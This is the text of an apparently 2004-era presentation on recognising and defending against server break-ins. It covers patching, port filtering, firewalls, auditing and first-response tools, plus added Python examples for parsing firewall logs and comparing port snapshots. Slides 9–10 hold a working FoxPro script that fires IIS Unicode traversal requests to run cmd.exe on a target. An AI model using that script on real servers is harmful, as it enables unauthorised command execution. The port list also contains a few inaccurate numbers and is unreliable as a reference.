1
Have you been Hacked…?
Today?
Yesterday?
Last Month?
  • Presented by:
  • Darrell Gardner
  • www.dngsolutions.net
2
Who am I?
  • xBase (clipper) Programmer since 1986
  • FoxPro programmer since 1992
  • Web Hosting Since 1997
  • Web Connection Developer since ’97
  • ISP supporting WC since ‘99.
  • West Wind MVP 2002
3
Agenda
  • Define hacking.
  • Risks of being hacked
  • How to defend against hackers / Trojans
    • Tools of the trade
    • Any specifics given about operating system protection are with Windows 2000 in mind.
  • Show what a hacked server looks like
4
Hacker Definitions:
  • Hackers come in many flavors. The word is used by the media to describe all of these.
  • Hackers - They know computers inside and out, how to make them dance the dance and sing the song.
  • Crackers - They break into computer systems. Operating Systems and their security are the meat.
  • CypherPunks - The masters of cryptography.
  • Phreakers - This group knows how to use the phone system in ways Ma Bell does not approve of.
  • Script Kiddies - The new kids on the block. Very little skill, but can point and click with the best of them. The really smart ones can maybe change the script a little. Not real hackers, but the media lumps them in with the rest.
5
Who is a Hacker/Cracker?
  • Hacker vs. Cracker
    • Hackers are usually there out of curiosity; they like to find vulnerabilities in systems and then notify folks of their findings, though usually anonymously.
    • Crackers are malicious in intent and are usually there for illegal reasons. White Hat – Good / Black Hat – Bad…. Back to your high school student with too much time...
  • High School Student with too much Time on his/her hands.
  • Co Worker (Programmer) with too much time on his/her hands.
  • Computer Hobbyist (with too much time on his/her hands).
  • Keep in mind any breach of a system is illegal and companies (and/or individuals) maintain legal recourse if they can prove wrongful entry into their systems.


6
Why do they hack?
  • … to be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence. *How to become a hacker…
    • Revenge – ex employee that wants to cause harm to the former employer.
    • Curiosity – I wonder how to do that or if I can?
    • Ego – Because I CAN!
    • To get paid! – Many companies hire hackers to test and beef up their systems to help prevent malicious attacks.



7
Risks of Being Hacked
  • Disruption of Service
  • Damaged Reputation
  • Exposure of Confidential Information
    • Lost trade secrets
  • Corruption of Data
    • The cracker doesn’t remove or delete data but CHANGES it.
  • Liability
    • What if your machine is used in an attack against someone else?
    • DDOS Attack
    • Validate company policies with regards to acceptable use and computing environments.
8
Do you have Company Policies?
  • Monitoring a users computer?
  • Consent to monitoring policy for employees?
  • Computer use or acceptable use policy, or privacy statement?


    • You don’t want to get into a legal quagmire over viewing files on an end-users computer. Make sure you have policies in place that allow you to protect your company assets while maintaining user rights.
  • Policy statements regarding external use or misuse of your systems.
    • (No Trespassing sign).




9
Demo of IE Hack using httpget
    * Demo program: sends each of the IIS Unicode traversal request forms
    * below to the target and stops at the first one the server does not
    * reject. o, cWebserver and lExit are private variables, so the HackSite
    * procedure sees them.
    parameter cWebserver
    SET DEFAULT TO c:\wconnect
    if type('m.cWebserver') # 'C' or empty(m.cWebserver)
       messagebox("A Domain or IP address must be specified",0,"Hackcode Error")
       return
    endif
    clear
    set classlib to classes\wwipstuff additive
    o = CREATEOBJECT('wwIPStuff')   && West Wind HTTP client; CREATE() is not a VFP function
    lExit = .f.
    =Hacksite([/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\])
    =Hacksite([/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\])
    =Hacksite([/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\])
    =Hacksite([/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\])
    =Hacksite([/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\])
    =Hacksite([/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\])
    =Hacksite([/Scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\])
    =Hacksite([/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\])
    =Hacksite([/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\])
    release o
    ? 'Program run completed'
    return
10
Hacksite Procedure
    * Called once per URL form by the demo program above. Uses the private
    * variables o (wwIPStuff object), cWebServer and lExit from the caller.
    Procedure HackSite
    parameter cSite
    if lExit                      && a previous call already got a hit
       return
    endif
    nResult = o.HTTPConnect(m.cWebServer)
    cOutput = []
    nSize = len(cOutput)
    nResult = o.HTTPGetEx(m.cSite, @cOutput, @nSize)   && body and size come back by reference
    ? nResult
    *!* ? m.cOutput
    *!* ? m.nSize
    * Sizes 0, 461 and 3243 are presumably the error-page lengths on the
    * test server; anything else that is not a 404 page is treated as a hit.
    if inlist(m.nSize, 0, 461, 3243) or atc('404 not found', m.cOutput)#0 or atc('HTTP 404', m.cOutput)#0
       ? m.cOutput
    else
       ? 'Success!'
       ? m.cOutput
       m.lExit = .t.
       suspend                    && stop so the response can be inspected in the debugger
    endif
    o.HTTPClose()
    return
11
How to Defend against Hackers
  • Make sure your machine is up to date with security patches
  • Do not run any services that are not necessary for the operation of that machine - BlackViper.com
      • No FTP if not needed
      • No Telnet
      • No IIS
      • …
  • IIS Lockdown tool
    • http://support.microsoft.com/default.aspx?kbid=325864
    • http://www.microsoft.com/downloads/details.aspx?displaylang=en&FamilyID=DDE9EFC0-BB30-47EB-9A61-FD755D23CDEC
  • Port Filtering…
12
Port Filtering via Local NIC Card

  • HTTP: 80
  • HTTPS: 443
  • FTP: 20 and 21
  • Telnet: 23
  • PING: 7
  • DNS: 53
  • Email Protocols
    • SMTP: 25
    • POP3: 110
    • IMAP: 220
  • IDENT: 113
  • Source-Off-Site: 16434-16437
  • SQL Server: 1433 and 1434
  • pcAnyWhere: 5631 and 5632
  • TerminalServices: 3389
  • VNC: 5900 (+ display number)
  • VNC Java Viewer: 5800 (+ display number)
  • VNC 'listening mode': 5500
  • Instant Messaging: 6891-6909
13
List Known Ports
  • West-Wind Wiki.
    • http://www.west-wind.com/wiki/kb.wiki?wc~CommonTcpIpPorts


  • Stengel.net tcp ports
    • http://www.stengel.net/tcpports.htm
14
Firewalls
  • Software based
      • Norton
      • Zone Alarm
      • Mcafee
      • Tiny Personal Firewall
      • Many More.. Do a search on Google for Software Firewalls


    • Make sure you don’t scan files that need to be opened shared, such as the Temp directory for WC applications.


  • Hardware based
      • Sonic Wall
      • Hot Brick
      • Cisco PIX
      • NetScreen
      • 3Com
      • Search Google for Hardware Firewalls

15
Firewall Information
  • 03/07/2004 08:42:05.368 -     Sub Seven Attack Dropped -     Source:202.31.228.146, 3189, WAN -     Destination:66.220.39.9, 27374, WAN –
  • 03/07/2004 05:01:17.512 -     NetBus Attack Dropped -     Source:172.174.142.160, 1632, WAN -     Destination:66.220.39.9, 12345, WAN –
  • 03/07/2004 05:01:17.256 -     Sub Seven Attack Dropped -     Source:172.174.142.160, 1629, WAN -     Destination:66.220.39.9, 27374, WAN –
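The firewall writes one line like those above per dropped packet, which is hard to read at volume. As an added example that is not from the presentation: a Python parser for this line format that turns the three slide lines into records, names the backdoor each signature refers to (Sub Seven on 27374, NetBus on 12345, as the lines show), and flags a source that probes more than one of those ports within a short window. The line format is inferred from the three lines shown; a different firewall or firmware may word its messages differently.

```python
import re
from datetime import datetime

# The three log lines from the presentation's "Firewall Information" slide.
SAMPLE_FIREWALL_LOG = """\
03/07/2004 08:42:05.368 -     Sub Seven Attack Dropped -     Source:202.31.228.146, 3189, WAN -     Destination:66.220.39.9, 27374, WAN –
03/07/2004 05:01:17.512 -     NetBus Attack Dropped -     Source:172.174.142.160, 1632, WAN -     Destination:66.220.39.9, 12345, WAN –
03/07/2004 05:01:17.256 -     Sub Seven Attack Dropped -     Source:172.174.142.160, 1629, WAN -     Destination:66.220.39.9, 27374, WAN –
"""

# Field layout inferred from the lines above: timestamp, message, source
# triple, destination triple, each separated by " - ".
LINE = re.compile(
    r"^(?P<stamp>\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2}\.\d{3}) -\s+"
    r"(?P<message>.+?) -\s+"
    r"Source:(?P<src_ip>[\d.]+), (?P<src_port>\d+), (?P<src_if>\w+) -\s+"
    r"Destination:(?P<dst_ip>[\d.]+), (?P<dst_port>\d+), (?P<dst_if>\w+)"
)

# Destination ports the slide's signatures refer to.
BACKDOOR_PORTS = {27374: "Sub Seven", 12345: "NetBus"}


def parse_firewall_log(text):
    """Turn drop lines into dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        d = m.groupdict()
        dst_port = int(d["dst_port"])
        events.append({
            "ts": datetime.strptime(d["stamp"], "%m/%d/%Y %H:%M:%S.%f"),
            "message": d["message"],
            "src_ip": d["src_ip"], "src_port": int(d["src_port"]),
            "dst_ip": d["dst_ip"], "dst_port": dst_port,
            "backdoor": BACKDOOR_PORTS.get(dst_port),
        })
    return events


def count_by_backdoor(events):
    """How many drops each backdoor signature accounts for."""
    counts = {}
    for e in events:
        name = e["backdoor"] or "other"
        counts[name] = counts.get(name, 0) + 1
    return counts


def probe_sources(events, window_seconds=60):
    """Sources that hit more than one distinct port within the window.

    A deliberately simple heuristic: one address touching several backdoor
    ports within seconds is a scanner, not a stray packet.
    """
    by_src = {}
    for e in events:
        by_src.setdefault(e["src_ip"], []).append(e)
    flagged = []
    for src, evs in by_src.items():
        ports = {e["dst_port"] for e in evs}
        times = sorted(e["ts"] for e in evs)
        if len(ports) > 1 and (times[-1] - times[0]).total_seconds() <= window_seconds:
            flagged.append(src)
    return sorted(flagged)


if __name__ == "__main__":
    evs = parse_firewall_log(SAMPLE_FIREWALL_LOG)
    print(count_by_backdoor(evs))
    print("probing sources:", probe_sources(evs))
```

On the slide's own three lines, 172.174.142.160 touches both backdoor ports a quarter of a second apart and is reported as a probing source; 202.31.228.146 is a single drop. With a full day's export, count_by_backdoor is the quick way to see which signature dominates.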


16
17
Figuring out you’ve been hacked.
  • Even after all the preparation, you find that you think your machine is acting differently. You fear the worst…
  • Enable Auditing (short term or full time for critical systems)
  • Check Event Logs
    • Export to CSV and sort in Excel.
  • Verify new Running Processes
    • Log existing processes after install of new software
    • Log existing process after patch updates
    • Monitor Logs for new process creations
    • BlackViper.com
      • Windows 2000 - http://blackviper.com/WIN2K/servicecfg.htm
      • Windows XP (Pro and Home) - http://blackviper.com/WinXP/servicecfg.htm
18
Enabling Auditing
  • From Administrative Tools in Control Panel
  • Select Local Security Setting
    • Then select Local Policies/Audit Policy.
19
Logs will grow fast.
  • Make sure you only enable Auditing full time on critical systems.
  • Then as needed on other systems.
20
Failed Logins
21
Tools of the trade
  • Create a CD with standard first response tools
    • Cmd.exe (many of the programs listed here are run from the command prompt; it is important to have a read-only copy on the CD).
    • Netstat.exe, net.exe and nbtstat.exe for network connections
    • At.exe, hostname.exe and ipconfig.exe for system configuration info.
    • DU Meter – Shows actual bandwidth being used.
    • Foundstone.com
      • Fport.exe Provides process to port mapping
      • Forensics toolkit
    • Sysinternals.com
      • Pslist.exe
      • Handle.exe
      • Listdlls.exe
      • Psuptime.exe – How long has the system been running.
22
Map Processes to ports/apps
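Slide 17's advice to log the running processes after installs and patches, and the fport process-to-port mapping on slide 21, come together in this added example, which is not from the presentation or from Foundstone: parse two fport-style snapshots in Python, the baseline saved after the last patch cycle and a fresh one, and report listeners that are not in the baseline plus any sitting on the backdoor ports from the firewall slide. The snapshots, the hypothetical wmgr.exe process and the exact column layout are constructed for the example.

```python
import re

# Constructed snapshots in the layout fport prints (Pid, Process, "->",
# Port, Proto, Path). The column spacing is an assumption, not fport's spec,
# which is why the parser keys on the "->" token rather than on columns.
BASELINE_SNAPSHOT = r"""
FPort v2.0 - TCP/IP Process to Port Mapper
Copyright 2000 by Foundstone, Inc.

Pid   Process            Port  Proto Path
392   svchost        ->  135   TCP   C:\WINNT\system32\svchost.exe
8     System         ->  139   TCP
1016  inetinfo       ->  80    TCP   C:\WINNT\system32\inetsrv\inetinfo.exe
1016  inetinfo       ->  443   TCP   C:\WINNT\system32\inetsrv\inetinfo.exe
"""

# Same machine a few weeks later; wmgr.exe is a hypothetical new listener.
CURRENT_SNAPSHOT = r"""
Pid   Process            Port  Proto Path
392   svchost        ->  135   TCP   C:\WINNT\system32\svchost.exe
8     System         ->  139   TCP
1016  inetinfo       ->  80    TCP   C:\WINNT\system32\inetsrv\inetinfo.exe
1016  inetinfo       ->  443   TCP   C:\WINNT\system32\inetsrv\inetinfo.exe
1224  wmgr           ->  27374 TCP   C:\WINNT\system32\wmgr.exe
"""

ENTRY = re.compile(r"^\s*(\d+)\s+(\S+)\s+->\s+(\d+)\s+(TCP|UDP)\s*(.*?)\s*$")

# Ports the firewall slide's signatures refer to.
BACKDOOR_PORTS = {27374: "Sub Seven", 12345: "NetBus"}


def parse_fport(text):
    """Return one dict per mapping line; banner and header lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = ENTRY.match(line)
        if m:
            pid, proc, port, proto, path = m.groups()
            entries.append({"pid": int(pid), "process": proc, "port": int(port),
                            "proto": proto, "path": path})
    return entries


def listener_key(entry):
    """Identity of a listener independent of the PID, which changes on every reboot."""
    return (entry["path"].lower() or entry["process"].lower(), entry["proto"], entry["port"])


def new_listeners(current, baseline):
    """Listeners present now that were not in the saved baseline."""
    known = {listener_key(e) for e in baseline}
    return [e for e in current if listener_key(e) not in known]


def backdoor_port_hits(entries):
    """(port, backdoor name, process) for anything bound to a known backdoor port."""
    return [(e["port"], BACKDOOR_PORTS[e["port"]], e["process"])
            for e in entries if e["port"] in BACKDOOR_PORTS]


def report(current, baseline):
    """Human-readable lines for the first-response checklist."""
    lines = []
    for e in new_listeners(current, baseline):
        tag = BACKDOOR_PORTS.get(e["port"])
        line = (f"NEW  pid {e['pid']:<5} {e['process']:<10} {e['proto']}/{e['port']:<5} "
                f"{e['path'] or '(no path)'}")
        if tag:
            line += f"  <- {tag} port"
        lines.append(line)
    return lines


if __name__ == "__main__":
    base = parse_fport(BASELINE_SNAPSHOT)
    cur = parse_fport(CURRENT_SNAPSHOT)
    for line in report(cur, base) or ["no new listeners"]:
        print(line)
```

Keep the baseline on the read-only first-response CD next to fport itself, and regenerate it after every patch cycle or software install, or the comparison will keep flagging legitimate changes. A new listener with no path, like the System entry above, deserves a second look with Handle.exe or Listdlls.exe before it is dismissed.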
23
Summary
  • What you should have picked up today…


  • No one is safe!
  • You can lower your odds of being hacked
  • Most Hacking occurs from within
  • Some tools to use for finding out if you’ve been hacked.
  • Firewalls help slow hackers down but don’t stop hackers
  • Maintaining your server is the best defense
  • Monitoring your logs is extremely important.
24
Where to Get More Information
  • How to be a hacker..
    • http://www.catb.org/~esr/faqs/hacker-howto.html
  • Who's to blame when hackers hack? Here's who
    • http://reviews-zdnet.com.com/4520-6033_16-4206911.html
  • Hacking and Network Defense
  • Verisign
  • West-Wind.com Wiki (security sites)
    • http://www.west-wind.com/wiki/kb.wiki?wc~SecuritySites
  • Google.com
    • Keyword Hacker
  • Go to www.dngsolutions.net for online access to this presentation.


25
Tip for XP backup to CD
  • You can use DOS xcopy or copy, or COPY TO from FoxPro, to burn CDs directly
    • C:\Documents and Settings\<user name>\Local Settings\Application Data\Microsoft\CD Burning\
    • Create a share or shortcut to that path and just copy to that shortcut.
  • WC Com Servers (errors fixing…)
    • If there’s interest……